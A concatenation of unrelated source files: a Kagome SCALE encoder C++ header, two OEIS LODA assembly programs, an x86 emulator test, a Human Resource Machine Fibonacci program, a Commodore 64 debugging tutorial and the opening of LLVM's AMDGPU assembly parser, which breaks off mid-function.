* Copyright Soramitsu Co., Ltd. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
#define KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
#include <deque>
#include <boost/optional.hpp>
#include <gsl/span>
#include "scale/detail/fixed_witdh_integer.hpp"
#include "scale/detail/tuple.hpp"
#include "scale/detail/variant.hpp"
namespace kagome::scale {
/**
* @class ScaleEncoderStream designed to scale-encode data to stream
*/
class ScaleEncoderStream {
public:
// special tag to differentiate encoding streams from others
static constexpr auto is_encoder_stream = true;
/// Getters
/**
* @return vector of bytes containing encoded data
*/
std::vector<uint8_t> data() const;
/**
* @brief scale-encodes pair of values
* @tparam F first value type
* @tparam S second value type
* @param p pair of values to encode
* @return reference to stream
*/
template <class F, class S>
ScaleEncoderStream &operator<<(const std::pair<F, S> &p) {
return *this << p.first << p.second;
}
/**
* @brief scale-encodes tuple of values
* @tparam T enumeration of types
* @param v tuple value
* @return reference to stream
*/
template <class... T>
ScaleEncoderStream &operator<<(const std::tuple<T...> v) {
return detail::encodeTuple(v, *this);
}
/**
* @brief scale-encodes variant value
* @tparam T type list
* @param v value to encode
* @return reference to stream
*/
template <class... T>
ScaleEncoderStream &operator<<(const boost::variant<T...> &v) {
return detail::encodeVariant(v, *this);
}
/**
* @brief scale-encodes collection of same time items
* @tparam T type of item
* @param c collection to encode
* @return reference to stream
*/
template <class T>
ScaleEncoderStream &operator<<(const std::vector<T> &c) {
return encodeCollection(c.size(), c.begin(), c.end());
}
/**
* @brief scale-encodes optional value
* @tparam T value type
* @param v value to encode
* @return reference to stream
*/
template <class T>
ScaleEncoderStream &operator<<(const boost::optional<T> &v) {
// optional bool is a special case of optional values
// it should be encoded using one byte instead of two
// as described in specification
if constexpr (std::is_same<T, bool>::value) {
return encodeOptionalBool(v);
}
if (!v.has_value()) {
return putByte(0u);
}
return putByte(1u) << *v;
}
/**
* @brief appends sequence of bytes
* @param v bytes sequence
* @return reference to stream
*/
template <class T>
ScaleEncoderStream &operator<<(const gsl::span<T> &v) {
return encodeCollection(v.size(), v.begin(), v.end());
}
/**
* @brief scale-encodes array of items
* @tparam T item type
* @tparam size of the array
* @param a reference to the array
* @return reference to stream
*/
template <typename T, size_t size>
ScaleEncoderStream &operator<<(const std::array<T, size> &a) {
// TODO(akvinikym) PRE-285: bad implementation: maybe move to another file
// and implement it
return encodeCollection(size, a.begin(), a.end());
}
/**
* @brief scale-encodes uint256_t to stream
* @param i value to decode
* @return reference to stream
*/
ScaleEncoderStream &operator<<(const boost::multiprecision::uint256_t &i) {
// TODO(akvinikym) PRE-285: maybe move to another file and implement it
return *this;
}
/**
* @brief scale-encodes std::reference_wrapper of a type
* @tparam T underlying type
* @param v value to encode
* @return reference to stream;
*/
template <class T>
ScaleEncoderStream &operator<<(const std::reference_wrapper<T> &v) {
return *this << static_cast<const T &>(v);
}
/**
* @brief scale-encodes a string view
* @param sv string_view item
* @return reference to stream
*/
ScaleEncoderStream &operator<<(std::string_view sv) {
return encodeCollection(sv.size(), sv.begin(), sv.end());
}
/**
* @brief scale-encodes any integral type including bool
* @tparam T integral type
* @param v value of integral type
* @return reference to stream
*/
template <typename T,
typename I = std::decay_t<T>,
typename = std::enable_if_t<std::is_integral<I>::value>>
ScaleEncoderStream &operator<<(T &&v) {
// encode bool
if constexpr (std::is_same<I, bool>::value) {
uint8_t byte = (v ? 1u : 0u);
return putByte(byte);
}
// put byte
if constexpr (sizeof(T) == 1u) {
// to avoid infinite recursion
return putByte(static_cast<uint8_t>(v));
}
// encode any other integer
detail::encodeInteger<I>(v, *this);
return *this;
}
/**
* @brief scale-encodes CompactInteger value as compact integer
* @param v value to encode
* @return reference to stream
*/
ScaleEncoderStream &operator<<(const CompactInteger &v);
protected:
/**
* @brief scale-encodes any collection
* @tparam It iterator over collection of bytes
* @param size size of the collection
* @param begin iterator pointing to the begin of collection
* @param end iterator pointing to the end of collection
* @return reference to stream
*/
template <class It>
ScaleEncoderStream &encodeCollection(const CompactInteger &size,
It &&begin,
It &&end) {
*this << size;
// NOLINTNEXTLINE(cppcoreguidelines-pro-bounds-pointer-arithmetic)
for (auto &&it = begin; it != end; ++it) {
*this << *it;
}
return *this;
}
/// Appenders
/**
* @brief puts a byte to buffer
* @param v byte value
* @return reference to stream
*/
ScaleEncoderStream &putByte(uint8_t v);
private:
ScaleEncoderStream &encodeOptionalBool(const boost::optional<bool> &v);
std::deque<uint8_t> stream_;
};
} // namespace kagome::scale
#endif // KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
|
; A006097: Gaussian binomial coefficient [ n,4 ] for q=2.
; Submitted by Christian Krause
; 1,31,651,11811,200787,3309747,53743987,866251507,13910980083,222984027123,3571013994483,57162391576563,914807651274739,14638597687734259,234230965858250739,3747802679431278579,59965700687947706355,959458073589354016755,15351384078270441402355,245622584459786286215155,3929964865019186398572531,62879465949619557050036211,1006071680068460422671314931,16097148680091934491674619891,257554393273444244298166906867,4120870407510897250621338890227,65933927441260682754345641390067
mov $2,$0
add $2,1
mov $3,$0
lpb $2
mov $0,$3
sub $2,1
sub $0,$2
seq $0,28258 ; Expansion of 1/((1-2*x)*(1-4*x)(1-8*x)(1-16*x)).
add $1,$0
lpe
mov $0,$1
|
%ifdef CONFIG
{
"RegData": {
"RAX": "0xF2F2F2F2F2F2F2F2",
"RDX": "0x0",
"RDI": "0xE000000F"
},
"MemoryRegions": {
"0x100000000": "4096"
}
}
%endif
mov rdx, 0xe0000000
mov rax, 0x4142434445464748
mov [rdx + 8 * 0], rax
mov rax, 0x5152535455565758
mov [rdx + 8 * 1], rax
mov rax, 0x0
mov [rdx + 8 * 2], rax
mov [rdx + 8 * 3], rax
lea rdi, [rdx + 8 * 2 + 7]
std
mov rcx, 8
mov rax, 0xF2
rep stosb ; rdi <- rsi
mov rax, [rdx + 8 * 2]
mov rdx, [rdx + 8 * 3]
hlt
|
-- HUMAN RESOURCE MACHINE PROGRAM --
-- fibseq[fibseq <= in1], ... -> out
a:
INBOX
COPYTO 2
BUMPUP 2
COPYFROM 9
COPYTO 0
BUMPUP 0
COPYTO 1
OUTBOX
b:
COPYFROM 1
OUTBOX
COPYFROM 1
ADD 0
COPYTO 0
SUB 2
JUMPN c
JUMP a
c:
COPYFROM 0
OUTBOX
COPYFROM 0
ADD 1
COPYTO 1
SUB 2
JUMPN b
JUMP a
|
;*******************************************************************************
;* Tutorial Twenty-Five Debugging Test Program *
;* *
;* Written By John C. Dale *
;* Tutorial #25 CBM Prg Studio Tutorial 005 *
;* Date : 18th Nov, 2017 *
;* *
;*******************************************************************************
;* *
;*******************************************************************************
;*******************************************************************************
;* *
;* Create DEBUG WatchList *
;* *
;*******************************************************************************
WATCH SCREENLOCATIONLO
WATCH SCREENLOCATIONHI
;*******************************************************************************
;* *
;* Assembler Static Variables *
;* *
;*******************************************************************************
SCREENLOCATIONLO = SCREENLOCATION + 1
SCREENLOCATIONHI = SCREENLOCATION + 2
*=$9000
lda #0
tax
tay
LOOPER
lda #'a'
SCREENLOCATION
sta $0400,x
inx
iny
lda SCREENLOCATION+1
clc
adc #40
sta SCREENLOCATION+1
lda SCREENLOCATION+2
adc #0
sta SCREENLOCATION+2
cpy #20
bne LOOPER
rts
|
; A146559: Expansion of (1-x)/(1 - 2*x + 2*x^2).
; 1,1,0,-2,-4,-4,0,8,16,16,0,-32,-64,-64,0,128,256,256,0,-512,-1024,-1024,0,2048,4096,4096,0,-8192,-16384,-16384,0,32768,65536,65536,0,-131072,-262144,-262144,0,524288,1048576,1048576,0,-2097152,-4194304,-4194304,0,8388608,16777216,16777216,0,-33554432,-67108864,-67108864,0,134217728,268435456,268435456,0,-536870912,-1073741824,-1073741824,0,2147483648,4294967296,4294967296,0,-8589934592,-17179869184,-17179869184,0,34359738368,68719476736,68719476736,0,-137438953472,-274877906944,-274877906944,0
mov $1,1
mov $2,2
lpb $0
sub $0,1
add $2,$1
add $1,1
mul $1,2
sub $1,$2
lpe
mov $0,$1
|
//===- AMDGPUAsmParser.cpp - Parse SI asm to MCInst instructions ----------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "AMDKernelCodeT.h"
#include "MCTargetDesc/AMDGPUMCTargetDesc.h"
#include "MCTargetDesc/AMDGPUTargetStreamer.h"
#include "SIDefines.h"
#include "SIInstrInfo.h"
#include "SIRegisterInfo.h"
#include "TargetInfo/AMDGPUTargetInfo.h"
#include "Utils/AMDGPUAsmUtils.h"
#include "Utils/AMDGPUBaseInfo.h"
#include "Utils/AMDKernelCodeTUtils.h"
#include "llvm/ADT/APFloat.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/StringSet.h"
#include "llvm/ADT/Twine.h"
#include "llvm/BinaryFormat/ELF.h"
#include "llvm/MC/MCAsmInfo.h"
#include "llvm/MC/MCContext.h"
#include "llvm/MC/MCExpr.h"
#include "llvm/MC/MCInst.h"
#include "llvm/MC/MCParser/MCAsmLexer.h"
#include "llvm/MC/MCParser/MCAsmParser.h"
#include "llvm/MC/MCParser/MCParsedAsmOperand.h"
#include "llvm/MC/MCParser/MCTargetAsmParser.h"
#include "llvm/MC/MCSymbol.h"
#include "llvm/MC/TargetRegistry.h"
#include "llvm/Support/AMDGPUMetadata.h"
#include "llvm/Support/AMDHSAKernelDescriptor.h"
#include "llvm/Support/Casting.h"
#include "llvm/Support/MachineValueType.h"
#include "llvm/Support/TargetParser.h"
using namespace llvm;
using namespace llvm::AMDGPU;
using namespace llvm::amdhsa;
namespace {
class AMDGPUAsmParser;
enum RegisterKind { IS_UNKNOWN, IS_VGPR, IS_SGPR, IS_AGPR, IS_TTMP, IS_SPECIAL };
//===----------------------------------------------------------------------===//
// Operand
//===----------------------------------------------------------------------===//
class AMDGPUOperand : public MCParsedAsmOperand {
enum KindTy {
Token,
Immediate,
Register,
Expression
} Kind;
SMLoc StartLoc, EndLoc;
const AMDGPUAsmParser *AsmParser;
public:
AMDGPUOperand(KindTy Kind_, const AMDGPUAsmParser *AsmParser_)
: Kind(Kind_), AsmParser(AsmParser_) {}
using Ptr = std::unique_ptr<AMDGPUOperand>;
struct Modifiers {
bool Abs = false;
bool Neg = false;
bool Sext = false;
bool hasFPModifiers() const { return Abs || Neg; }
bool hasIntModifiers() const { return Sext; }
bool hasModifiers() const { return hasFPModifiers() || hasIntModifiers(); }
int64_t getFPModifiersOperand() const {
int64_t Operand = 0;
Operand |= Abs ? SISrcMods::ABS : 0u;
Operand |= Neg ? SISrcMods::NEG : 0u;
return Operand;
}
int64_t getIntModifiersOperand() const {
int64_t Operand = 0;
Operand |= Sext ? SISrcMods::SEXT : 0u;
return Operand;
}
int64_t getModifiersOperand() const {
assert(!(hasFPModifiers() && hasIntModifiers())
&& "fp and int modifiers should not be used simultaneously");
if (hasFPModifiers()) {
return getFPModifiersOperand();
} else if (hasIntModifiers()) {
return getIntModifiersOperand();
} else {
return 0;
}
}
friend raw_ostream &operator <<(raw_ostream &OS, AMDGPUOperand::Modifiers Mods);
};
enum ImmTy {
ImmTyNone,
ImmTyGDS,
ImmTyLDS,
ImmTyOffen,
ImmTyIdxen,
ImmTyAddr64,
ImmTyOffset,
ImmTyInstOffset,
ImmTyOffset0,
ImmTyOffset1,
ImmTyCPol,
ImmTySWZ,
ImmTyTFE,
ImmTyD16,
ImmTyClampSI,
ImmTyOModSI,
ImmTyDPP8,
ImmTyDppCtrl,
ImmTyDppRowMask,
ImmTyDppBankMask,
ImmTyDppBoundCtrl,
ImmTyDppFi,
ImmTySdwaDstSel,
ImmTySdwaSrc0Sel,
ImmTySdwaSrc1Sel,
ImmTySdwaDstUnused,
ImmTyDMask,
ImmTyDim,
ImmTyUNorm,
ImmTyDA,
ImmTyR128A16,
ImmTyA16,
ImmTyLWE,
ImmTyExpTgt,
ImmTyExpCompr,
ImmTyExpVM,
ImmTyFORMAT,
ImmTyHwreg,
ImmTyOff,
ImmTySendMsg,
ImmTyInterpSlot,
ImmTyInterpAttr,
ImmTyAttrChan,
ImmTyOpSel,
ImmTyOpSelHi,
ImmTyNegLo,
ImmTyNegHi,
ImmTySwizzle,
ImmTyGprIdxMode,
ImmTyHigh,
ImmTyBLGP,
ImmTyCBSZ,
ImmTyABID,
ImmTyEndpgm,
};
enum ImmKindTy {
ImmKindTyNone,
ImmKindTyLiteral,
ImmKindTyConst,
};
private:
struct TokOp {
const char *Data;
unsigned Length;
};
struct ImmOp {
int64_t Val;
ImmTy Type;
bool IsFPImm;
mutable ImmKindTy Kind;
Modifiers Mods;
};
struct RegOp {
unsigned RegNo;
Modifiers Mods;
};
union {
TokOp Tok;
ImmOp Imm;
RegOp Reg;
const MCExpr *Expr;
};
public:
bool isToken() const override {
if (Kind == Token)
return true;
// When parsing operands, we can't always tell if something was meant to be
// a token, like 'gds', or an expression that references a global variable.
// In this case, we assume the string is an expression, and if we need to
// interpret is a token, then we treat the symbol name as the token.
return isSymbolRefExpr();
}
bool isSymbolRefExpr() const {
return isExpr() && Expr && isa<MCSymbolRefExpr>(Expr);
}
bool isImm() const override {
return Kind == Immediate;
}
void setImmKindNone() const {
assert(isImm());
Imm.Kind = ImmKindTyNone;
}
void setImmKindLiteral() const {
assert(isImm());
Imm.Kind = ImmKindTyLiteral;
}
void setImmKindConst() const {
assert(isImm());
Imm.Kind = ImmKindTyConst;
}
bool IsImmKindLiteral() const {
return isImm() && Imm.Kind == ImmKindTyLiteral;
}
bool isImmKindConst() const {
return isImm() && Imm.Kind == ImmKindTyConst;
}
bool isInlinableImm(MVT type) const;
bool isLiteralImm(MVT type) const;
bool isRegKind() const {
return Kind == Register;
}
bool isReg() const override {
return isRegKind() && !hasModifiers();
}
bool isRegOrInline(unsigned RCID, MVT type) const {
return isRegClass(RCID) || isInlinableImm(type);
}
bool isRegOrImmWithInputMods(unsigned RCID, MVT type) const {
return isRegOrInline(RCID, type) || isLiteralImm(type);
}
bool isRegOrImmWithInt16InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::i16);
}
bool isRegOrImmWithInt32InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::i32);
}
bool isRegOrImmWithInt64InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_64RegClassID, MVT::i64);
}
bool isRegOrImmWithFP16InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::f16);
}
bool isRegOrImmWithFP32InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::f32);
}
bool isRegOrImmWithFP64InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_64RegClassID, MVT::f64);
}
bool isVReg() const {
return isRegClass(AMDGPU::VGPR_32RegClassID) ||
isRegClass(AMDGPU::VReg_64RegClassID) ||
isRegClass(AMDGPU::VReg_96RegClassID) ||
isRegClass(AMDGPU::VReg_128RegClassID) ||
isRegClass(AMDGPU::VReg_160RegClassID) ||
isRegClass(AMDGPU::VReg_192RegClassID) ||
isRegClass(AMDGPU::VReg_256RegClassID) ||
isRegClass(AMDGPU::VReg_512RegClassID) ||
isRegClass(AMDGPU::VReg_1024RegClassID);
}
bool isVReg32() const {
return isRegClass(AMDGPU::VGPR_32RegClassID);
}
bool isVReg32OrOff() const {
return isOff() || isVReg32();
}
bool isNull() const {
return isRegKind() && getReg() == AMDGPU::SGPR_NULL;
}
bool isVRegWithInputMods() const;
bool isSDWAOperand(MVT type) const;
bool isSDWAFP16Operand() const;
bool isSDWAFP32Operand() const;
bool isSDWAInt16Operand() const;
bool isSDWAInt32Operand() const;
bool isImmTy(ImmTy ImmT) const {
return isImm() && Imm.Type == ImmT;
}
bool isImmModifier() const {
return isImm() && Imm.Type != ImmTyNone;
}
bool isClampSI() const { return isImmTy(ImmTyClampSI); }
bool isOModSI() const { return isImmTy(ImmTyOModSI); }
bool isDMask() const { return isImmTy(ImmTyDMask); }
bool isDim() const { return isImmTy(ImmTyDim); }
bool isUNorm() const { return isImmTy(ImmTyUNorm); }
bool isDA() const { return isImmTy(ImmTyDA); }
bool isR128A16() const { return isImmTy(ImmTyR128A16); }
bool isGFX10A16() const { return isImmTy(ImmTyA16); }
bool isLWE() const { return isImmTy(ImmTyLWE); }
bool isOff() const { return isImmTy(ImmTyOff); }
bool isExpTgt() const { return isImmTy(ImmTyExpTgt); }
bool isExpVM() const { return isImmTy(ImmTyExpVM); }
bool isExpCompr() const { return isImmTy(ImmTyExpCompr); }
bool isOffen() const { return isImmTy(ImmTyOffen); }
bool isIdxen() const { return isImmTy(ImmTyIdxen); }
bool isAddr64() const { return isImmTy(ImmTyAddr64); }
bool isOffset() const { return isImmTy(ImmTyOffset) && isUInt<16>(getImm()); }
bool isOffset0() const { return isImmTy(ImmTyOffset0) && isUInt<8>(getImm()); }
bool isOffset1() const { return isImmTy(ImmTyOffset1) && isUInt<8>(getImm()); }
bool isFlatOffset() const { return isImmTy(ImmTyOffset) || isImmTy(ImmTyInstOffset); }
bool isGDS() const { return isImmTy(ImmTyGDS); }
bool isLDS() const { return isImmTy(ImmTyLDS); }
bool isCPol() const { return isImmTy(ImmTyCPol); }
bool isSWZ() const { return isImmTy(ImmTySWZ); }
bool isTFE() const { return isImmTy(ImmTyTFE); }
bool isD16() const { return isImmTy(ImmTyD16); }
bool isFORMAT() const { return isImmTy(ImmTyFORMAT) && isUInt<7>(getImm()); }
bool isBankMask() const { return isImmTy(ImmTyDppBankMask); }
bool isRowMask() const { return isImmTy(ImmTyDppRowMask); }
bool isBoundCtrl() const { return isImmTy(ImmTyDppBoundCtrl); }
bool isFI() const { return isImmTy(ImmTyDppFi); }
bool isSDWADstSel() const { return isImmTy(ImmTySdwaDstSel); }
bool isSDWASrc0Sel() const { return isImmTy(ImmTySdwaSrc0Sel); }
bool isSDWASrc1Sel() const { return isImmTy(ImmTySdwaSrc1Sel); }
bool isSDWADstUnused() const { return isImmTy(ImmTySdwaDstUnused); }
bool isInterpSlot() const { return isImmTy(ImmTyInterpSlot); }
bool isInterpAttr() const { return isImmTy(ImmTyInterpAttr); }
bool isAttrChan() const { return isImmTy(ImmTyAttrChan); }
bool isOpSel() const { return isImmTy(ImmTyOpSel); }
bool isOpSelHi() const { return isImmTy(ImmTyOpSelHi); }
bool isNegLo() const { return isImmTy(ImmTyNegLo); }
bool isNegHi() const { return isImmTy(ImmTyNegHi); }
bool isHigh() const { return isImmTy(ImmTyHigh); }
bool isMod() const {
return isClampSI() || isOModSI();
}
bool isRegOrImm() const {
return isReg() || isImm();
}
bool isRegClass(unsigned RCID) const;
bool isInlineValue() const;
bool isRegOrInlineNoMods(unsigned RCID, MVT type) const {
return isRegOrInline(RCID, type) && !hasModifiers();
}
bool isSCSrcB16() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::i16);
}
bool isSCSrcV2B16() const {
return isSCSrcB16();
}
bool isSCSrcB32() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::i32);
}
bool isSCSrcB64() const {
return isRegOrInlineNoMods(AMDGPU::SReg_64RegClassID, MVT::i64);
}
bool isBoolReg() const;
bool isSCSrcF16() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::f16);
}
bool isSCSrcV2F16() const {
return isSCSrcF16();
}
bool isSCSrcF32() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::f32);
}
bool isSCSrcF64() const {
return isRegOrInlineNoMods(AMDGPU::SReg_64RegClassID, MVT::f64);
}
bool isSSrcB32() const {
return isSCSrcB32() || isLiteralImm(MVT::i32) || isExpr();
}
bool isSSrcB16() const {
return isSCSrcB16() || isLiteralImm(MVT::i16);
}
bool isSSrcV2B16() const {
llvm_unreachable("cannot happen");
return isSSrcB16();
}
bool isSSrcB64() const {
// TODO: Find out how SALU supports extension of 32-bit literals to 64 bits.
// See isVSrc64().
return isSCSrcB64() || isLiteralImm(MVT::i64);
}
bool isSSrcF32() const {
return isSCSrcB32() || isLiteralImm(MVT::f32) || isExpr();
}
bool isSSrcF64() const {
return isSCSrcB64() || isLiteralImm(MVT::f64);
}
bool isSSrcF16() const {
return isSCSrcB16() || isLiteralImm(MVT::f16);
}
bool isSSrcV2F16() const {
llvm_unreachable("cannot happen");
return isSSrcF16();
}
bool isSSrcV2FP32() const {
llvm_unreachable("cannot happen");
return isSSrcF32();
}
bool isSCSrcV2FP32() const {
llvm_unreachable("cannot happen");
return isSCSrcF32();
}
bool isSSrcV2INT32() const {
llvm_unreachable("cannot happen");
return isSSrcB32();
}
bool isSCSrcV2INT32() const {
llvm_unreachable("cannot happen");
return isSCSrcB32();
}
bool isSSrcOrLdsB32() const {
return isRegOrInlineNoMods(AMDGPU::SRegOrLds_32RegClassID, MVT::i32) ||
isLiteralImm(MVT::i32) || isExpr();
}
bool isVCSrcB32() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::i32);
}
bool isVCSrcB64() const {
return isRegOrInlineNoMods(AMDGPU::VS_64RegClassID, MVT::i64);
}
bool isVCSrcB16() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::i16);
}
bool isVCSrcV2B16() const {
return isVCSrcB16();
}
bool isVCSrcF32() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::f32);
}
bool isVCSrcF64() const {
return isRegOrInlineNoMods(AMDGPU::VS_64RegClassID, MVT::f64);
}
bool isVCSrcF16() const {
return isRegOrInlineNoMods(AMDGPU::VS_32RegClassID, MVT::f16);
}
bool isVCSrcV2F16() const {
return isVCSrcF16();
}
bool isVSrcB32() const {
return isVCSrcF32() || isLiteralImm(MVT::i32) || isExpr();
}
bool isVSrcB64() const {
return isVCSrcF64() || isLiteralImm(MVT::i64);
}
bool isVSrcB16() const {
return isVCSrcB16() || isLiteralImm(MVT::i16);
}
bool isVSrcV2B16() const {
return isVSrcB16() || isLiteralImm(MVT::v2i16);
}
bool isVCSrcV2FP32() const {
return isVCSrcF64();
}
bool isVSrcV2FP32() const {
return isVSrcF64() || isLiteralImm(MVT::v2f32);
}
bool isVCSrcV2INT32() const {
return isVCSrcB64();
}
bool isVSrcV2INT32() const {
return isVSrcB64() || isLiteralImm(MVT::v2i32);
}
bool isVSrcF32() const {
return isVCSrcF32() || isLiteralImm(MVT::f32) || isExpr();
}
bool isVSrcF64() const {
return isVCSrcF64() || isLiteralImm(MVT::f64);
}
bool isVSrcF16() const {
return isVCSrcF16() || isLiteralImm(MVT::f16);
}
bool isVSrcV2F16() const {
return isVSrcF16() || isLiteralImm(MVT::v2f16);
}
bool isVISrcB32() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::i32);
}
bool isVISrcB16() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::i16);
}
bool isVISrcV2B16() const {
return isVISrcB16();
}
bool isVISrcF32() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::f32);
}
bool isVISrcF16() const {
return isRegOrInlineNoMods(AMDGPU::VGPR_32RegClassID, MVT::f16);
}
bool isVISrcV2F16() const {
return isVISrcF16() || isVISrcB32();
}
bool isVISrc_64B64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::i64);
}
bool isVISrc_64F64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::f64);
}
bool isVISrc_64V2FP32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::f32);
}
bool isVISrc_64V2INT32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_64RegClassID, MVT::i32);
}
bool isVISrc_256B64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::i64);
}
bool isVISrc_256F64() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::f64);
}
bool isVISrc_128B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::i16);
}
bool isVISrc_128V2B16() const {
return isVISrc_128B16();
}
bool isVISrc_128B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::i32);
}
bool isVISrc_128F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::f32);
}
bool isVISrc_256V2FP32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::f32);
}
bool isVISrc_256V2INT32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_256RegClassID, MVT::i32);
}
bool isVISrc_512B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::i32);
}
bool isVISrc_512B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::i16);
}
bool isVISrc_512V2B16() const {
return isVISrc_512B16();
}
bool isVISrc_512F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::f32);
}
bool isVISrc_512F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_512RegClassID, MVT::f16);
}
bool isVISrc_512V2F16() const {
return isVISrc_512F16() || isVISrc_512B32();
}
bool isVISrc_1024B32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::i32);
}
bool isVISrc_1024B16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::i16);
}
bool isVISrc_1024V2B16() const {
return isVISrc_1024B16();
}
bool isVISrc_1024F32() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::f32);
}
bool isVISrc_1024F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_1024RegClassID, MVT::f16);
}
bool isVISrc_1024V2F16() const {
return isVISrc_1024F16() || isVISrc_1024B32();
}
bool isAISrcB32() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::i32);
}
bool isAISrcB16() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::i16);
}
bool isAISrcV2B16() const {
return isAISrcB16();
}
bool isAISrcF32() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::f32);
}
bool isAISrcF16() const {
return isRegOrInlineNoMods(AMDGPU::AGPR_32RegClassID, MVT::f16);
}
bool isAISrcV2F16() const {
return isAISrcF16() || isAISrcB32();
}
bool isAISrc_64B64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_64RegClassID, MVT::i64);
}
bool isAISrc_64F64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_64RegClassID, MVT::f64);
}
bool isAISrc_128B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::i32);
}
bool isAISrc_128B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::i16);
}
bool isAISrc_128V2B16() const {
return isAISrc_128B16();
}
bool isAISrc_128F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::f32);
}
bool isAISrc_128F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_128RegClassID, MVT::f16);
}
bool isAISrc_128V2F16() const {
return isAISrc_128F16() || isAISrc_128B32();
}
bool isVISrc_128F16() const {
return isRegOrInlineNoMods(AMDGPU::VReg_128RegClassID, MVT::f16);
}
bool isVISrc_128V2F16() const {
return isVISrc_128F16() || isVISrc_128B32();
}
bool isAISrc_256B64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_256RegClassID, MVT::i64);
}
bool isAISrc_256F64() const {
return isRegOrInlineNoMods(AMDGPU::AReg_256RegClassID, MVT::f64);
}
bool isAISrc_512B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::i32);
}
bool isAISrc_512B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::i16);
}
bool isAISrc_512V2B16() const {
return isAISrc_512B16();
}
bool isAISrc_512F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::f32);
}
bool isAISrc_512F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_512RegClassID, MVT::f16);
}
bool isAISrc_512V2F16() const {
return isAISrc_512F16() || isAISrc_512B32();
}
bool isAISrc_1024B32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::i32);
}
bool isAISrc_1024B16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::i16);
}
bool isAISrc_1024V2B16() const {
return isAISrc_1024B16();
}
bool isAISrc_1024F32() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::f32);
}
bool isAISrc_1024F16() const {
return isRegOrInlineNoMods(AMDGPU::AReg_1024RegClassID, MVT::f16);
}
bool isAISrc_1024V2F16() const {
return isAISrc_1024F16() || isAISrc_1024B32();
}
bool isKImmFP32() const {
return isLiteralImm(MVT::f32);
}
bool isKImmFP16() const {
return isLiteralImm(MVT::f16);
}
bool isMem() const override {
return false;
}
bool isExpr() const {
return Kind == Expression;
}
bool isSoppBrTarget() const {
return isExpr() || isImm();
}
bool isSWaitCnt() const;
bool isHwreg() const;
bool isSendMsg() const;
bool isSwizzle() const;
bool isSMRDOffset8() const;
bool isSMEMOffset() const;
bool isSMRDLiteralOffset() const;
bool isDPP8() const;
bool isDPPCtrl() const;
bool isBLGP() const;
bool isCBSZ() const;
bool isABID() const;
bool isGPRIdxMode() const;
bool isS16Imm() const;
bool isU16Imm() const;
bool isEndpgm() const;
StringRef getExpressionAsToken() const {
assert(isExpr());
